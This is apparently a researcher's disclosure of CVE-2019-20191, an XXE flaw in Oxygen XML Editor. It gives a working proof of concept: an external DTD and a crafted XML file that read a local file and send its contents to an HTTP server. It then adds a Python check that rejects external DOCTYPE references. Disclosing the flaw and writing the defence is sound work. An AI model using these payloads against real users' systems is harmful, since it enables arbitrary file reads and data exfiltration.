CVE-2019-20191: Oxygen XML Editor 21.1.1 allows XXE

0xPablito
Mar 14, 2020


Oxygen XML Editor is the best XML editor available and provides a comprehensive suite of XML authoring and development tools. It is designed to accommodate a large number of users, ranging from beginners to XML experts. It is available on multiple platforms, all major operating systems, and as a standalone application or an Eclipse plug-in. You can use Oxygen XML Editor in conjunction with all XML-based technologies and it includes a large variety of powerful tools for creating, editing, and publishing XML documents.

https://www.oxygenxml.com/

An XML External Entity (XXE) attack is a type of attack against an application that parses XML input. It occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server-side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. In this case the attack allows arbitrary file reads on the system.

👨🏼‍💻Discovered by Pablo Santiago.

📝Published 13/01/2020.

💉CVE-2019-20191

📄Vulnerable version ≤ 21.1.1

Risk

A malicious user could craft a malicious XML file that, when opened in the editor, reads files from the system.

Proof Of Concept

1.- Start an HTTP web server

python -m SimpleHTTPServer 8000

2.- Create the following payload, save it as test.dtd, and upload it to your server

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
%all;

3.- Create a malicious XML file

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\FILE">
<!ENTITY % dtd SYSTEM "http://localhost:8000/test.dtd">
%dtd;]>
<pwn>&send;</pwn>

4.- Open the malicious XML file with the software and observe the incoming request in your server's log.
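The XXE description above and the proof of concept both come down to one structural feature: a DOCTYPE that makes the parser fetch something outside the document (an external DTD, or SYSTEM/PUBLIC entity declarations, here parameter entities). The following Python check is an added example for defenders, not code from the original post or from the Oxygen project: it inspects the DOCTYPE of an untrusted document before parsing and refuses anything with external references, otherwise handing the text to the standard-library parser. The function names are hypothetical, and the sample documents are constructed to mirror the payload shown above.

```python
import re
import xml.etree.ElementTree as ET

# The whole DOCTYPE declaration, including an internal subset in [...], if present.
DOCTYPE_RE = re.compile(r'<!DOCTYPE[^\[>]*(?:\[.*?\])?\s*>', re.DOTALL | re.IGNORECASE)
# <!ENTITY [%] name SYSTEM|PUBLIC ...> declarations inside the internal subset.
EXT_ENTITY_RE = re.compile(
    r'<!ENTITY\s+(?P<param>%\s+)?(?P<name>[^\s>]+)\s+(?P<kind>SYSTEM|PUBLIC)\b',
    re.IGNORECASE,
)
# An external DTD referenced from the DOCTYPE header itself.
EXT_DTD_RE = re.compile(r'<!DOCTYPE\s+\S+\s+(?P<kind>SYSTEM|PUBLIC)\b', re.IGNORECASE)


def find_external_references(xml_text):
    """Return (category, name) tuples for every external resource the DOCTYPE
    would make a parser fetch. An empty list means the DOCTYPE, if any,
    is purely internal and cannot trigger XXE."""
    findings = []
    match = DOCTYPE_RE.search(xml_text)
    if not match:
        return findings
    doctype = match.group(0)
    if EXT_DTD_RE.match(doctype):
        findings.append(("external-dtd", doctype.split()[1]))
    for decl in EXT_ENTITY_RE.finditer(doctype):
        category = "parameter-entity" if decl.group("param") else "general-entity"
        findings.append((category, decl.group("name")))
    return findings


def load_untrusted_xml(xml_text):
    """Refuse documents whose DOCTYPE references external resources; otherwise
    parse with the standard-library parser, which still expands internal entities."""
    findings = find_external_references(xml_text)
    if findings:
        raise ValueError("external references in DOCTYPE: %r" % findings)
    return ET.fromstring(xml_text)


# Constructed sample mirroring the proof-of-concept document above.
MALICIOUS = r'''<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\FILE">
<!ENTITY % dtd SYSTEM "http://localhost:8000/test.dtd">
%dtd;]>
<pwn>&send;</pwn>'''

# Constructed sample with a purely internal DTD subset; this is harmless.
BENIGN = '''<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY company "Example Corp">
]>
<note><to>&company;</to></note>'''

# Constructed sample that pulls in an external DTD from the DOCTYPE header.
EXTERNAL_DTD = '<!DOCTYPE foo SYSTEM "http://localhost:8000/test.dtd"><foo/>'


if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS), ("benign", BENIGN), ("external-dtd", EXTERNAL_DTD)):
        try:
            root = load_untrusted_xml(doc)
            print(label, "-> parsed, root element:", root.tag)
        except ValueError as err:
            print(label, "-> rejected:", err)
```

The check is deliberately conservative: it rejects any external reference rather than trying to judge whether a given URL or file path is safe, because the parameter-entity indirection in the proof of concept shows that the dangerous part (the `send` entity) need not appear in the document at all. Parsers that expose a switch to disable DOCTYPE or external entity resolution should use it in addition to, not instead of, a pre-check like this one.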

Acknowledgment

https://www.oxygenxml.com/security/advisory/SYNC-2019-111401.html

